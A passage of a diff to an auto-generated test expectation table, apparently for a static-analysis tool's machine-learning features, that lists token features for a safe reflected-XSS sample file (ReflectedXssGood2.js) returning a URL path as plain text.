name)\\n} | calleeImports | http | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | functio ... name)\\n} | contextFunctionInterfaces | sendTextResponse(resp, text) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | functio ... name)\\n} | contextSurroundingFunctionParameters | (req, resp) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | functio ... name)\\n} | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | return of anonymous function | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | return of anonymous function | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | return of anonymous function | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | return of anonymous function | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:39:3:41 | req | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:44:3:47 | resp | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:12 | target | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:12 | target | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:12 | target | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:12 | target | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:12 | target | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target ... , true) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target ... , true) | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target ... , true) | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target ... , true) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:7:4:39 | target ... , true) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:18 | url | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:18 | url | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:18 | url | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:18 | url | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:18 | url | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:24 | url.parse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:24 | url.parse | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:24 | url.parse | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:24 | url.parse | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:24 | url.parse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | exceptional return of url.par ... , true) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | exceptional return of url.par ... , true) | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | exceptional return of url.par ... , true) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | exceptional return of url.par ... , true) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | url.par ... , true) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | url.par ... , true) | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | url.par ... , true) | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | url.par ... , true) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:16:4:39 | url.par ... , true) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:20:4:24 | parse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:20:4:24 | parse | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:20:4:24 | parse | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:20:4:24 | parse | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:20:4:24 | parse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:28 | req | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:28 | req | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:28 | req | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:28 | req | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:28 | req | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:32 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:32 | req.url | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:32 | req.url | calleeImports | url | @@ -20731,6 +137741,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:32 | req.url | enclosingFunctionName | createServer#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:32 | req.url | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:26:4:32 | req.url | receiverName | url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:30:4:32 | url | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:30:4:32 | url | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:30:4:32 | url | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:30:4:32 | url | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:30:4:32 | url | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:35:4:38 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:35:4:38 | true | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:35:4:38 | true | calleeImports | url | @@ -20740,6 +137755,120 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:35:4:38 | true | enclosingFunctionName | createServer#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:35:4:38 | true | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:4:35:4:38 | true | receiverName | url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:18 | sendTextResponse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:18 | sendTextResponse | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:18 | sendTextResponse | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:18 | sendTextResponse | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:18 | sendTextResponse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | exceptional return of sendTex ... thname) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | exceptional return of sendTex ... thname) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | exceptional return of sendTex ... thname) | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | exceptional return of sendTex ... thname) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | exceptional return of sendTex ... thname) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | sendTex ... thname) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | sendTex ... thname) | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | sendTex ... thname) | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | sendTex ... thname) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:3:5:41 | sendTex ... thname) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:20:5:23 | resp | CalleeFlexibleAccessPath | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:20:5:23 | resp | InputArgumentIndex | 0 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:20:5:23 | resp | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:20:5:23 | resp | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:20:5:23 | resp | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:20:5:23 | resp | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:20:5:23 | resp | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:31 | target | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:31 | target | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:31 | target | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:31 | target | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:31 | target | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:40 | target.pathname | CalleeFlexibleAccessPath | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:40 | target.pathname | InputArgumentIndex | 1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:40 | target.pathname | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:40 | target.pathname | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:40 | target.pathname | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:40 | target.pathname | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:26:5:40 | target.pathname | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:33:5:40 | pathname | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:33:5:40 | pathname | contextSurroundingFunctionParameters | (req, resp) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:33:5:40 | pathname | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:33:5:40 | pathname | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:5:33:5:40 | pathname | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:8:0 | this | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:8:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:8:0 | this | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:8:0 | this | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:8:0 | this | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | 'arguments' object of function sendTextResponse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | 'arguments' object of function sendTextResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | 'arguments' object of function sendTextResponse | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | 'arguments' object of function sendTextResponse | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | 'arguments' object of function sendTextResponse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | exceptional return of function sendTextResponse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | exceptional return of function sendTextResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | exceptional return of function sendTextResponse | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | exceptional return of function sendTextResponse | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | exceptional return of function sendTextResponse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | functio ... ext);\\n} | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | functio ... ext);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | functio ... ext);\\n} | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | return of function sendTextResponse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | return of function sendTextResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | return of function sendTextResponse | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | return of function sendTextResponse | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:1:11:1 | return of function sendTextResponse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:10:8:25 | sendTextResponse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:10:8:25 | sendTextResponse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:10:8:25 | sendTextResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:10:8:25 | sendTextResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:10:8:25 | sendTextResponse | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:10:8:25 | sendTextResponse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:10:8:25 | sendTextResponse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:27:8:30 | resp | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:8:33:8:36 | text | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:6 | resp | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:6 | resp | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:6 | resp | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:6 | resp | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:6 | resp | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:16 | resp.writeHead | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:16 | resp.writeHead | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:16 | resp.writeHead | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:16 | resp.writeHead | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:16 | resp.writeHead | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | exceptional return of resp.wr ... tf-8"}) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | exceptional return of resp.wr ... tf-8"}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | exceptional return of resp.wr ... tf-8"}) | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | exceptional return of resp.wr ... tf-8"}) | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | exceptional return of resp.wr ... tf-8"}) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | resp.wr ... tf-8"}) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | resp.wr ... tf-8"}) | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | resp.wr ... tf-8"}) | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | resp.wr ... tf-8"}) | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:3:9:68 | resp.wr ... tf-8"}) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:8:9:16 | writeHead | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:8:9:16 | writeHead | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:8:9:16 | writeHead | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:8:9:16 | writeHead | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:8:9:16 | writeHead | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:18:9:20 | 200 | CalleeFlexibleAccessPath | resp.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:18:9:20 | 200 | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:18:9:20 | 200 | contextFunctionInterfaces | sendTextResponse(resp, text) | @@ -20756,6 +137885,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:23:9:67 | {"conte ... utf-8"} | enclosingFunctionName | sendTextResponse | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:23:9:67 | {"conte ... utf-8"} | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:23:9:67 | {"conte ... utf-8"} | receiverName | resp | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:37 | "content-type" | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:37 | "content-type" | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:37 | "content-type" | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:37 | "content-type" | enclosingFunctionName | sendTextResponse | +| 